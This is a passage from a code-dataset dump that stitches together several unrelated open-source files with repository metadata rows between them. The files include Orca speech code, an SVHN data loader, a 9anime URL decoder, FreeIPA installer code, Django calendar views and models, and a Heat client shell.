# suggests we haven't been doing anything with the lastKeyEchoTime in
# years. TODO - JD: Dig into this and if it's truly useless, kill it.)
if self._lastKeyEchoTime:
interrupt = interrupt and (time.time() - self._lastKeyEchoTime) > 0.5
if text:
self._speak(text, acss)
def speakUtterances(self, utteranceList, acss=None, interrupt=True):
# In order to re-enable this, a potentially non-trivial amount of work
# will be needed to ensure multiple utterances sent to speech.speak
# do not result in the intial utterances getting cut off before they
# can be heard by the user. Anyone needing to interrupt speech can
# do so via speech.stop -- or better yet, by using the default script
# method's presentationInterrupt.
#if interrupt:
# self._cancel()
for utterance in utteranceList:
if utterance:
self._speak(utterance, acss)
def sayAll(self, utteranceIterator, progressCallback):
GLib.idle_add(self._say_all, utteranceIterator, progressCallback)
def speakCharacter(self, character, acss=None):
self._apply_acss(acss)
name = chnames.getCharacterName(character)
if not name or name == character:
self._send_command(self._client.char, character)
return
if orca_state.activeScript:
name = orca_state.activeScript.\
utilities.adjustForPronunciation(name)
self.speak(name, acss)
def speakKeyEvent(self, event, acss=None):
event_string = event.getKeyName()
if orca_state.activeScript:
event_string = orca_state.activeScript.\
utilities.adjustForPronunciation(event_string)
lockingStateString = event.getLockingStateString()
event_string = "%s %s" % (event_string, lockingStateString)
self.speak(event_string, acss=acss)
self._lastKeyEchoTime = time.time()
def increaseSpeechRate(self, step=5):
self._change_default_speech_rate(step)
def decreaseSpeechRate(self, step=5):
self._change_default_speech_rate(step, decrease=True)
def increaseSpeechPitch(self, step=0.5):
self._change_default_speech_pitch(step)
def decreaseSpeechPitch(self, step=0.5):
self._change_default_speech_pitch(step, decrease=True)
def increaseSpeechVolume(self, step=0.5):
self._change_default_speech_volume(step)
def decreaseSpeechVolume(self, step=0.5):
self._change_default_speech_volume(step, decrease=True)
def stop(self):
self._cancel()
def shutdown(self):
self._client.close()
del SpeechServer._active_servers[self._id]
def reset(self, text=None, acss=None):
self._client.close()
self._init()
def list_output_modules(self):
"""Return names of available output modules as a tuple of strings.
This method is not a part of Orca speech API, but is used internally
by the Speech Dispatcher backend.
The returned tuple can be empty if the information can not be
obtained (e.g. with an older Speech Dispatcher version).
"""
try:
return self._send_command(self._client.list_output_modules)
except AttributeError:
return ()
except speechd.SSIPCommandError:
return ()
|
lgpl-2.1
| -4,297,985,001,126,757,000
| 37.359441
| 100
| 0.584096
| false
| 4.025095
| false
| false
| false
|
googleinterns/out-of-distribution
|
src/datasets/load_svhn.py
|
1
|
2077
|
import multiprocessing
import os
from typing import Union
import torchvision
from torch.utils.data import DataLoader, ConcatDataset, Subset
from torchvision import transforms
from root import from_root
from src.misc.utils import read_lines
DATA_DIRPATH = from_root("data/svhn")
SPLIT_DIRPATH = from_root("splits/svhn")
SVHN_TRAIN_MEAN = [0.4310, 0.4303, 0.4464]
SVHN_TRAIN_STD = [0.1965, 0.1983, 0.1994]
def load_svhn_infer(split: str, batch_size: int, n_workers: Union[str, int]) -> DataLoader:
if split not in {"train", "val", "test"}:
raise ValueError("Split must be 'train', 'val', or 'test'!")
if batch_size <= 0:
raise ValueError("Batch_size must be positive!")
if type(n_workers) == str and n_workers != "n_cores":
raise ValueError("If n_workers is a string, it must be 'n_cores'!")
if type(n_workers) == int and n_workers < 0:
raise ValueError("If n_workers is an int, it must be non-negative!")
transform = transforms.ToTensor()
if split == "train":
dataset = ConcatDataset([
torchvision.datasets.SVHN(DATA_DIRPATH, split="train", transform=transform, download=True),
torchvision.datasets.SVHN(DATA_DIRPATH, split="extra", transform=transform, download=True)
])
indices = read_lines(os.path.join(SPLIT_DIRPATH, "train.txt"), int)
dataset = Subset(dataset, indices)
elif split == "val":
dataset = ConcatDataset([
torchvision.datasets.SVHN(DATA_DIRPATH, split="train", transform=transform, download=True),
torchvision.datasets.SVHN(DATA_DIRPATH, split="extra", transform=transform, download=True)
])
indices = read_lines(os.path.join(SPLIT_DIRPATH, "val.txt"), int)
dataset = Subset(dataset, indices)
else:
dataset = torchvision.datasets.SVHN(DATA_DIRPATH, split="test", transform=transform, download=True)
if n_workers == "n_cores":
n_workers = multiprocessing.cpu_count()
return DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=n_workers)
|
apache-2.0
| -1,984,148,229,769,911,600
| 41.387755
| 107
| 0.672123
| false
| 3.496633
| false
| false
| false
|
DxCx/plugin.video.9anime
|
resources/lib/ui/NineAnimeUrlExtender.py
|
1
|
3603
|
import re
from string import ascii_lowercase as lc, ascii_uppercase as uc, maketrans
class NineAnimeUrlExtender:
# _TS_MAP_TABLE = [i for i in uc if ord(i) % 2 != 0] + [i for i in uc if ord(i) % 2 == 0]
_CUSB64_MAP_TABLE = [i for i in lc if ord(i) % 2 != 0] + [i for i in lc if ord(i) % 2 == 0]
_ts_value_regex = re.compile(ur"<html.*data-ts\s*=[\"]([^\"]+?)[\"]")
_server_value_regex = \
re.compile(ur"\<div\sclass=\"widget-title\"\>\s(.+?)\s\<\/div\>")
_active_server_regex = \
re.compile(ur"\<span\sclass=\"tab active\"\sdata-name=\"(\d+)\".+?")
def __init__(self):
pass
@classmethod
def decode_info(cls, obj):
newObj = {}
for key, value in obj.iteritems():
if type(value) is unicode or type(value) is str:
if value.startswith('.'):
newObj[key] = cls._rot_string(value[1:])
if value.startswith('-'):
newObj[key] = cls._cusb64_string(value[1:])
else:
newObj[key] = value
elif type(value) is dict:
newObj[key] = cls.decode_info(value)
else:
newObj[key] = value
return newObj
@classmethod
def get_server_value(cls, content):
servers = cls._server_value_regex.findall(content)[0]
active_server = cls._active_server_regex.findall(servers)
if len(active_server) != 1:
raise Exception("Cant extract server id")
return int(active_server[0], 10)
@classmethod
def get_ts_value(cls, content):
ts_value = cls._ts_value_regex.findall(content)[0]
return ts_value
# return cls._decode_ts_value(ts_value)
@classmethod
def _rot_string(cls, content):
RotBy = 8
lookup = maketrans(lc + uc, lc[RotBy:] + lc[:RotBy] + uc[RotBy:] + uc[:RotBy])
decoded = str(content).translate(lookup)
return decoded
# @classmethod
# def _decode_ts_value(cls, ts):
# decoded = ""
# for c in ts:
# replaced = False
# if c not in cls._TS_MAP_TABLE:
# decoded += c
# continue
# decoded += uc[cls._TS_MAP_TABLE.index(c)]
# missing_padding = len(decoded) % 4
# if missing_padding:
# decoded += b'=' * (4 - missing_padding)
# return decoded.decode("base64")
@classmethod
def _cusb64_string(cls, content):
decoded = ""
for c in content:
replaced = False
if c not in cls._CUSB64_MAP_TABLE:
decoded += c
continue
decoded += lc[cls._CUSB64_MAP_TABLE.index(c)]
missing_padding = len(decoded) % 4
if missing_padding:
decoded += b'=' * (4 - missing_padding)
return decoded.decode("base64")
@classmethod
def get_extra_url_parameter(cls, id, server, ts):
DD = 'bfcad671'
params = [
('id', str(id)),
('ts', str(ts)),
('server', str(server)),
]
o = cls._s(DD)
for i in params:
o += cls._s(cls._a(DD + i[0], i[1]))
return o
@classmethod
def _s(cls, t):
i = 0
for (e, c) in enumerate(t):
i += ord(c) + e
return i
@classmethod
def _a(cls, t, e):
n = 0
for i in range(max(len(t), len(e))):
n *= ord(e[i]) if i < len(e) else 8
n *= ord(t[i]) if i < len(t) else 8
return format(n, 'x') # convert n to hex string
|
gpl-3.0
| -6,710,349,284,111,533,000
| 30.605263
| 95
| 0.502914
| false
| 3.441261
| false
| false
| false
|
martincochran/score-minion
|
oauth_token_manager_test.py
|
1
|
2779
|
#!/usr/bin/env python
#
# Copyright 2014 Martin Cochran
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import test_env_setup
from google.appengine.ext import testbed
import oauth_token_manager
class OauthTokenManagerTest(unittest.TestCase):
def setUp(self):
"""Stub out the datastore so we can test it."""
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_memcache_stub()
self.testbed.init_datastore_v3_stub()
def tearDown(self):
self.testbed.deactivate()
def testMockManager(self):
token_manager = oauth_token_manager.OauthTokenManager(is_mock=True)
self.assertEquals('', token_manager.GetSecret())
self.assertEquals('', token_manager.GetToken())
secret = 'my secret'
token = 'token for my secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
secret = 'new secret'
token = 'token for new secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
# Ensure we didn't actually touch the data store.
account_query = oauth_token_manager.ApiSecret.query(
ancestor=oauth_token_manager.api_secret_key()).order(
-oauth_token_manager.ApiSecret.date_added)
oauth_secrets = account_query.fetch(10)
self.assertEquals(0, len(oauth_secrets))
def testDatastoreBackedManager(self):
token_manager = oauth_token_manager.OauthTokenManager()
self.assertEquals('', token_manager.GetSecret())
self.assertEquals('', token_manager.GetToken())
secret = 'my secret'
token = 'token for my secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
secret = 'new secret'
token = 'token for new secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
if __name__ == '__main__':
unittest.main()
|
apache-2.0
| -7,579,290,179,118,641,000
| 30.224719
| 74
| 0.721123
| false
| 3.775815
| true
| false
| false
|
ofayans/freeipa
|
ipaserver/install/odsexporterinstance.py
|
1
|
6389
|
#
# Copyright (C) 2014 FreeIPA Contributors see COPYING for license
#
import os
import pwd
import grp
import ldap
from ipaserver.install import service
from ipaserver.install import installutils
from ipapython.ipa_log_manager import root_logger
from ipapython.dn import DN
from ipapython import ipautil
from ipaplatform.constants import constants
from ipaplatform.paths import paths
from ipaplatform import services
from ipalib import errors, api
class ODSExporterInstance(service.Service):
def __init__(self, fstore=None):
super(ODSExporterInstance, self).__init__(
"ipa-ods-exporter",
service_desc="IPA OpenDNSSEC exporter daemon",
fstore=fstore,
keytab=paths.IPA_ODS_EXPORTER_KEYTAB,
service_prefix=u'ipa-ods-exporter'
)
self.ods_uid = None
self.ods_gid = None
self.enable_if_exists = False
suffix = ipautil.dn_attribute_property('_suffix')
def create_instance(self, fqdn, realm_name):
self.backup_state("enabled", self.is_enabled())
self.backup_state("running", self.is_running())
self.fqdn = fqdn
self.realm = realm_name
self.suffix = ipautil.realm_to_suffix(self.realm)
try:
self.stop()
except Exception:
pass
# checking status step must be first
self.step("checking status", self.__check_dnssec_status)
self.step("setting up DNS Key Exporter", self.__setup_key_exporter)
self.step("setting up kerberos principal", self.__setup_principal)
self.step("disabling default signer daemon", self.__disable_signerd)
self.step("starting DNS Key Exporter", self.__start)
self.step("configuring DNS Key Exporter to start on boot", self.__enable)
self.start_creation()
def __check_dnssec_status(self):
try:
self.ods_uid = pwd.getpwnam(constants.ODS_USER).pw_uid
except KeyError:
raise RuntimeError("OpenDNSSEC UID not found")
try:
self.ods_gid = grp.getgrnam(constants.ODS_GROUP).gr_gid
except KeyError:
raise RuntimeError("OpenDNSSEC GID not found")
def __enable(self):
try:
self.ldap_enable('DNSKeyExporter', self.fqdn, None,
self.suffix)
except errors.DuplicateEntry:
root_logger.error("DNSKeyExporter service already exists")
def __setup_key_exporter(self):
installutils.set_directive(paths.SYSCONFIG_IPA_ODS_EXPORTER,
'SOFTHSM2_CONF',
paths.DNSSEC_SOFTHSM2_CONF,
quotes=False, separator='=')
def __setup_principal(self):
assert self.ods_uid is not None
for f in [paths.IPA_ODS_EXPORTER_CCACHE, self.keytab]:
try:
os.remove(f)
except OSError:
pass
installutils.kadmin_addprinc(self.principal)
# Store the keytab on disk
installutils.create_keytab(paths.IPA_ODS_EXPORTER_KEYTAB,
self.principal)
p = self.move_service(self.principal)
if p is None:
# the service has already been moved, perhaps we're doing a DNS reinstall
dns_exporter_principal_dn = DN(
('krbprincipalname', self.principal),
('cn', 'services'), ('cn', 'accounts'), self.suffix)
else:
dns_exporter_principal_dn = p
# Make sure access is strictly reserved to the ods user
os.chmod(self.keytab, 0o440)
os.chown(self.keytab, 0, self.ods_gid)
dns_group = DN(('cn', 'DNS Servers'), ('cn', 'privileges'),
('cn', 'pbac'), self.suffix)
mod = [(ldap.MOD_ADD, 'member', dns_exporter_principal_dn)]
try:
self.admin_conn.modify_s(dns_group, mod)
except ldap.TYPE_OR_VALUE_EXISTS:
pass
except Exception as e:
root_logger.critical("Could not modify principal's %s entry: %s"
% (dns_exporter_principal_dn, str(e)))
raise
# limit-free connection
mod = [(ldap.MOD_REPLACE, 'nsTimeLimit', '-1'),
(ldap.MOD_REPLACE, 'nsSizeLimit', '-1'),
(ldap.MOD_REPLACE, 'nsIdleTimeout', '-1'),
(ldap.MOD_REPLACE, 'nsLookThroughLimit', '-1')]
try:
self.admin_conn.modify_s(dns_exporter_principal_dn, mod)
except Exception as e:
root_logger.critical("Could not set principal's %s LDAP limits: %s"
% (dns_exporter_principal_dn, str(e)))
raise
def __disable_signerd(self):
signerd_service = services.knownservices.ods_signerd
if self.get_state("singerd_running") is None:
self.backup_state("singerd_running", signerd_service.is_running())
if self.get_state("singerd_enabled") is None:
self.backup_state("singerd_enabled", signerd_service.is_enabled())
# disable default opendnssec signer daemon
signerd_service.stop()
signerd_service.mask()
def __start(self):
self.start()
def remove_service(self):
try:
api.Command.service_del(self.principal)
except errors.NotFound:
pass
def uninstall(self):
if not self.is_configured():
return
self.print_msg("Unconfiguring %s" % self.service_name)
# just eat states
self.restore_state("running")
self.restore_state("enabled")
# stop and disable service (IPA service, we do not need it anymore)
self.disable()
self.stop()
# restore state of dnssec default signer daemon
signerd_enabled = self.restore_state("singerd_enabled")
signerd_running = self.restore_state("singerd_running")
signerd_service = services.knownservices.ods_signerd
signerd_service.unmask()
# service was stopped and disabled by setup
if signerd_enabled:
signerd_service.enable()
if signerd_running:
signerd_service.start()
installutils.remove_keytab(self.keytab)
installutils.remove_ccache(ccache_path=paths.IPA_ODS_EXPORTER_CCACHE)
|
gpl-3.0
| 3,183,045,108,307,513,300
| 33.535135
| 85
| 0.594929
| false
| 3.943827
| false
| false
| false
|
k-team/KHome
|
modules/co_sensor/local_module.py
|
1
|
1375
|
#-*- coding: utf-8 -*-
import module
from module import use_module
import fields
class COSensor(module.Base):
update_rate = 1000
public_name = 'Capteur CO'
alarm = use_module('Alarm')
class co(fields.sensor.CO,
fields.syntax.Numeric,
fields.io.Graphable,
fields.persistant.Database,
fields.Base):
update_rate = 60
public_name = 'Taux de CO (ppm)'
class limit_value_co(
fields.syntax.Numeric,
fields.io.Readable,
fields.persistant.Database,
fields.Base):
public_name = 'Limite CO (ppm)'
init_value = 5.00
class message_co(
fields.syntax.String,
fields.io.Readable,
fields.io.Writable,
fields.persistant.Database,
fields.Base):
public_name = 'Message d\'alerte CO'
init_value = 'Au #secours il y a la masse de #CO #YOLO #pompier'
class security(fields.Base):
update_rate = 60
def always(self):
try:
sensor = self.module.co()[1]
lie = self.module.limit_value_co()[1]
message = self.module.message_co()[1]
except TypeError:
pass
else:
if sensor > lie:
self.module.alarm.message(message)
|
mit
| 4,025,652,573,530,431,000
| 26.5
| 72
| 0.531636
| false
| 3.951149
| false
| false
| false
|
imposeren/django-happenings
|
happenings/views.py
|
1
|
10237
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
# python lib:
from datetime import date, timedelta
# django:
from django.db.models.functions import ExtractHour
from django.views.generic import ListView, DetailView
from django.conf import settings
from django.shortcuts import get_object_or_404
from django.utils.dates import MONTHS_ALT
try:
from django.core.urlresolvers import reverse
except ImportError:
from django.urls import reverse
# thirdparties:
import six
# happenings:
from .models import Event
from .utils.displays import month_display, day_display
from .utils.next_event import get_next_event
from .utils.mixins import JSONResponseMixin
from .utils import common as c
URLS_NAMESPACE = getattr(settings, "CALENDAR_URLS_NAMESPACE", 'calendar')
class GenericEventView(JSONResponseMixin, ListView):
model = Event
def render_to_response(self, context, **kwargs):
self.postprocess_context(context)
if self.request.is_ajax():
return self.render_to_json_response(context, **kwargs)
return super(GenericEventView, self).render_to_response(
context, **kwargs
)
def get_context_data(self, **kwargs):
context = super(GenericEventView, self).get_context_data(**kwargs)
self.net, self.category, self.tag = c.get_net_category_tag(
self.request
)
if self.category is not None:
context['cal_category'] = self.category
if self.tag is not None:
context['cal_tag'] = self.tag
return context
def postprocess_context(self, context, *args, **kwargs):
return
class EventMonthView(GenericEventView):
template_name = 'happenings/event_month_list.html'
def get_year_and_month(self, net, qs, **kwargs):
"""
Get the year and month. First tries from kwargs, then from
querystrings. If none, or if cal_ignore qs is specified,
sets year and month to this year and this month.
"""
now = c.get_now()
year = now.year
month = now.month + net
month_orig = None
if 'cal_ignore=true' not in qs:
if 'year' and 'month' in self.kwargs: # try kwargs
year, month_orig = map(
int, (self.kwargs['year'], self.kwargs['month'])
)
month = month_orig + net
else:
try: # try querystring
year = int(self.request.GET['cal_year'])
month_orig = int(self.request.GET['cal_month'])
month = month_orig + net
except Exception:
pass
# return the year and month, and any errors that may have occurred do
# to an invalid month/year being given.
return c.clean_year_month(year, month, month_orig)
def get_month_events(self, *args, **kwargs):
return Event.objects.all_month_events(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EventMonthView, self).get_context_data(**kwargs)
qs = self.request.META['QUERY_STRING']
year, month, error = self.get_year_and_month(self.net, qs)
# add a dict containing the year, month, and month name to the context
current = dict(
year=year, month_num=month, month=MONTHS_ALT[month][:3]
)
context['current'] = current
display_month = MONTHS_ALT[month]
if isinstance(display_month, six.binary_type):
display_month = display_month.decode('utf-8')
context['month_and_year'] = u"%(month)s, %(year)d" % (
{'month': display_month, 'year': year}
)
if error: # send any year/month errors
context['cal_error'] = error
all_month_events = list(
self.get_month_events(
year, month, self.category, self.tag, loc=True, cncl=True
).annotate(
start_hour=ExtractHour('start_date')
).order_by('start_hour')
)
context['raw_all_month_events'] = all_month_events
context['show_events'] = False
if getattr(settings, "CALENDAR_SHOW_LIST", False):
context['show_events'] = True
context['events'] = c.order_events(all_month_events, d=True) \
if self.request.is_ajax() else c.order_events(all_month_events)
return context
def postprocess_context(self, context, *args, **kwargs):
qs = self.request.META['QUERY_STRING']
mini = True if 'cal_mini=true' in qs else False
start_day = getattr(settings, "CALENDAR_START_DAY", 0)
# get any querystrings that are not next/prev/year/month
if qs:
qs = c.get_qs(qs)
if getattr(settings, "CALENDAR_PASS_VIEW_CONTEXT_TO_DISPLAY_METHOD", False):
month_display_base_context = dict(context)
month_display_base_context.pop('events', None)
else:
month_display_base_context = None
all_month_events = context['raw_all_month_events']
context['calendar'] = month_display(
context['current']['year'],
context['current']['month_num'],
all_month_events,
start_day,
self.net,
qs,
mini,
request=self.request,
base_context=month_display_base_context,
)
class EventDayView(GenericEventView):
template_name = 'happenings/event_day_list.html'
def get_calendar_back_url(self, year, month_num):
self.request.current_app = self.request.resolver_match.namespace
if URLS_NAMESPACE:
view_name = URLS_NAMESPACE + ':list'
else:
view_name = 'list'
return reverse(view_name, args=(year, month_num), current_app=self.request.current_app)
def check_for_cancelled_events(self, d):
"""Check if any events are cancelled on the given date 'd'."""
for event in self.events:
for cn in event.cancellations.all():
if cn.date == d:
event.title += ' (CANCELLED)'
def get_month_events(self, *args, **kwargs):
return Event.objects.all_month_events(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EventDayView, self).get_context_data(**kwargs)
kw = self.kwargs
y, m, d = map(int, (kw['year'], kw['month'], kw['day']))
year, month, day, error = c.clean_year_month_day(y, m, d, self.net)
if error:
context['cal_error'] = error
# Note that we don't prefetch 'cancellations' because they will be
# prefetched later (in day_display in displays.py)
all_month_events = self.get_month_events(
year, month, self.category, self.tag
)
self.events = day_display(
year, month, all_month_events, day
)
self.check_for_cancelled_events(d=date(year, month, day))
context['events'] = self.events
display_month = MONTHS_ALT[month]
if isinstance(display_month, six.binary_type):
display_month = display_month.decode('utf-8')
context['month'] = display_month
context['month_num'] = month
context['year'] = year
context['day'] = day
context['month_day_year'] = u"%(month)s %(day)d, %(year)d" % (
{'month': display_month, 'day': day, 'year': year}
)
context['calendar_back_url'] = self.get_calendar_back_url(year, month)
# for use in the template to build next & prev querystrings
context['next'], context['prev'] = c.get_next_and_prev(self.net)
return context
class EventDetailView(DetailView):
model = Event
context_object_name = 'event'
def get_object(self):
return get_object_or_404(
Event.objects.prefetch_related(
'location', 'categories', 'tags', 'cancellations'
),
pk=self.kwargs['pk']
)
def get_cncl_days(self):
now = c.get_now()
cncl = self.object.cancellations.all()
return [(x.date, x.reason) for x in cncl if x.date >= now.date()]
def check_cncl(self, d):
cncl = self.object.cancellations.all()
return True if [x for x in cncl if x.date == d] else False
def get_context_data(self, **kwargs):
now = c.get_now()
context = super(EventDetailView, self).get_context_data(**kwargs)
e = self.object
for choice in Event.REPEAT_CHOICES:
if choice[0] == e.repeat:
context['repeat'] = choice[1]
context['cncl_days'] = self.get_cncl_days()
event = [e] # event needs to be an iterable, see get_next_event()
if not e.repeats('NEVER'): # event is ongoing; get next occurrence
if e.will_occur(now):
year, month, day = get_next_event(event, now)
next_event = date(year, month, day)
context['next_event'] = date(year, month, day)
context['next_or_prev_cncl'] = self.check_cncl(next_event)
else: # event is finished repeating; get last occurrence
end = e.end_repeat
last_event = end
if e.repeats('WEEKDAY'):
year, month, day = c.check_weekday(
end.year, end.month, end.day, reverse=True
)
last_event = date(year, month, day)
context['last_event'] = last_event
context['next_or_prev_cncl'] = self.check_cncl(last_event)
else:
if e.is_chunk():
# list of days for single-day event chunk
context['event_days'] = ( # list comp
(e.l_start_date + timedelta(days=x))
for x in range(e.start_end_diff + 1)
)
else:
# let template know if this single-day, non-repeating event is
# cancelled
context['this_cncl'] = self.check_cncl(e.l_start_date.date())
return context
|
bsd-2-clause
| 1,189,771,832,417,715,700
| 34.058219
| 95
| 0.57722
| false
| 3.851392
| false
| false
| false
|
radez/python-heatclient
|
heatclient/v1/shell.py
|
1
|
7499
|
# Copyright 2012 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import textwrap
from heatclient.common import utils
import heatclient.exc as exc
def format_parameters(params):
'''
Reformat parameters into dict of format expected by the API
'''
parameters = {}
if params:
for count, p in enumerate(params.split(';'), 1):
(n, v) = p.split('=')
parameters[n] = v
return parameters
def _set_template_fields(hc, args, fields):
if args.template_file:
fields['template'] = json.loads(open(args.template_file).read())
elif args.template_url:
fields['template_url'] = args.template_url
elif args.template_object:
template_body = hc.raw_request('GET', args.template_object)
if template_body:
fields['template'] = json.loads(template_body)
else:
raise exc.CommandError('Could not fetch template from %s'
% args.template_object)
else:
raise exc.CommandError('Need to specify exactly one of '
'--template-file, --template-url '
'or --template-object')
@utils.arg('-f', '--template-file', metavar='<FILE>',
help='Path to the template.')
@utils.arg('-u', '--template-url', metavar='<URL>',
help='URL of template.')
@utils.arg('-o', '--template-object', metavar='<URL>',
help='URL to retrieve template object (e.g from swift)')
@utils.arg('-c', '--create-timeout', metavar='<TIMEOUT>',
default=60, type=int,
help='Stack creation timeout in minutes. Default: 60')
@utils.arg('-P', '--parameters', metavar='<KEY1=VALUE1;KEY2=VALUE2...>',
help='Parameter values used to create the stack.')
@utils.arg('name', metavar='<STACK_NAME>',
help='Name of the stack to create.')
def do_create(hc, args):
'''Create the stack'''
fields = {'stack_name': args.name,
'timeoutmins': args.create_timeout,
'parameters': format_parameters(args.parameters)}
_set_template_fields(hc, args, fields)
hc.stacks.create(**fields)
do_list(hc)
@utils.arg('id', metavar='<NAME/ID>', help='Name and ID of stack to delete.')
def do_delete(hc, args):
'''Delete the stack'''
fields = {'stack_id': args.id}
try:
hc.stacks.delete(**fields)
except exc.HTTPNotFound:
raise exc.CommandError('Stack not found: %s' % args.id)
else:
do_list(hc)
@utils.arg('id', metavar='<NAME/ID>', help='Name and ID of stack to describe.')
def do_describe(hc, args):
'''Describe the stack'''
fields = {'stack_id': args.id}
try:
stack = hc.stacks.get(**fields)
except exc.HTTPNotFound:
raise exc.CommandError('Stack not found: %s' % args.id)
else:
text_wrap = lambda d: '\n'.join(textwrap.wrap(d, 55))
link_format = lambda links: '\n'.join([l['href'] for l in links])
json_format = lambda js: json.dumps(js, indent=2)
formatters = {
'description': text_wrap,
'template_description': text_wrap,
'stack_status_reason': text_wrap,
'parameters': json_format,
'outputs': json_format,
'links': link_format
}
utils.print_dict(stack.to_dict(), formatters=formatters)
@utils.arg('-f', '--template-file', metavar='<FILE>',
help='Path to the template.')
@utils.arg('-u', '--template-url', metavar='<URL>',
help='URL of template.')
@utils.arg('-o', '--template-object', metavar='<URL>',
help='URL to retrieve template object (e.g from swift)')
@utils.arg('-P', '--parameters', metavar='<KEY1=VALUE1;KEY2=VALUE2...>',
help='Parameter values used to create the stack.')
@utils.arg('id', metavar='<NAME/ID>',
help='Name and ID of stack to update.')
def do_update(hc, args):
'''Update the stack'''
fields = {'stack_id': args.id,
'parameters': format_parameters(args.parameters)}
_set_template_fields(hc, args, fields)
hc.stacks.update(**fields)
do_list(hc)
def do_list(hc, args={}):
'''List the user's stacks'''
kwargs = {}
stacks = hc.stacks.list(**kwargs)
field_labels = ['Name/ID', 'Status', 'Created']
fields = ['id', 'stack_status', 'creation_time']
formatters = {
'id': lambda row: '%s/%s' % (row.stack_name, row.id)
}
utils.print_list(stacks, fields, field_labels,
formatters=formatters, sortby=2)
@utils.arg('id', metavar='<NAME/ID>',
help='Name and ID of stack to get the template for.')
def do_gettemplate(hc, args):
'''Get the template'''
fields = {'stack_id': args.id}
try:
template = hc.stacks.template(**fields)
except exc.HTTPNotFound:
raise exc.CommandError('Stack not found: %s' % args.id)
else:
print json.dumps(template, indent=2)
@utils.arg('-u', '--template-url', metavar='<URL>',
help='URL of template.')
@utils.arg('-f', '--template-file', metavar='<FILE>',
help='Path to the template.')
@utils.arg('-o', '--template-object', metavar='<URL>',
help='URL to retrieve template object (e.g from swift)')
@utils.arg('-P', '--parameters', metavar='<KEY1=VALUE1;KEY2=VALUE2...>',
help='Parameter values to validate.')
def do_validate(hc, args):
'''Validate a template with parameters'''
fields = {'parameters': format_parameters(args.parameters)}
_set_template_fields(hc, args, fields)
validation = hc.stacks.validate(**fields)
print json.dumps(validation, indent=2)
# TODO only need to implement this once the server supports it
#@utils.arg('-u', '--template-url', metavar='<URL>',
# help='URL of template.')
#@utils.arg('-f', '--template-file', metavar='<FILE>',
# help='Path to the template.')
#def do_estimate_template_cost(hc, args):
# '''Returns the estimated monthly cost of a template'''
# pass
#
#
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the events for.')
#def do_event_list(hc, args):
# '''List events for a stack'''
# pass
#
#
#@utils.arg('-r', '--resource', metavar='<RESOURCE_ID>',
# help='ID of the resource to show the details for.')
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the resource for.')
#def do_resource(hc, args):
# '''Describe the resource'''
# pass
#
#
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the resources for.')
#def do_resource_list(hc, args):
# '''Show list of resources belonging to a stack'''
# pass
#
#
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the resource details for.')
#def do_resource_list_details(hc, args):
# '''Detailed view of resources belonging to a stack'''
# pass
|
apache-2.0
| 647,137,651,970,098,300
| 34.540284
| 79
| 0.604881
| false
| 3.688637
| false
| false
| false
|
koebbe/homeworks
|
visit/models.py
|
1
|
5342
|
import datetime
from django.db import models
from django.contrib.auth.models import User
import json
import uuid
from qa import models as qamodels
PROGRAM_MODEL_CHOICES = (
('school_wide', '2+2'),
('fellowship', 'Fellowship Model'),
('ptlt', 'PTLT'),
)
class District(models.Model):
name = models.CharField(max_length=255, unique=True)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('name', )
class School(models.Model):
name = models.CharField(max_length=255)
district = models.ForeignKey(District, related_name='schools', blank=True, null=True)
program_model = models.CharField(max_length=20, choices=PROGRAM_MODEL_CHOICES)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('name', )
class StaffStatus(models.Model):
name = models.CharField(max_length=255, unique=True)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('name', )
verbose_name_plural = "Staff Statuses"
class ProgramDirector(models.Model):
#user = models.OneToOneField(User, null=True, blank=True)
staff = models.OneToOneField('Staff', null=True, blank=True)
schools = models.ManyToManyField(School, blank=True, related_name='programdirectors')
receive_emails = models.BooleanField(default=True)
class Meta:
ordering = ('staff', )
class SiteCoordinator(models.Model):
staff = models.OneToOneField('Staff', null=True, blank=True)
school = models.ForeignKey(School, blank=True, related_name='sitecoordinators')
class Meta:
ordering = ('staff', )
class Staff(models.Model):
key = models.UUIDField(default=uuid.uuid4, unique=True, editable=False)
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
email = models.EmailField(blank=True, null=True,)
school = models.ForeignKey(School, related_name='staff')
secondary_schools = models.ManyToManyField(School, blank=True, related_name='secondary_staff')
position = models.CharField(max_length=255, blank=True)
grade = models.CharField(max_length=255, blank=True)
#status = models.ForeignKey(StaffStatus, related_name='staff')
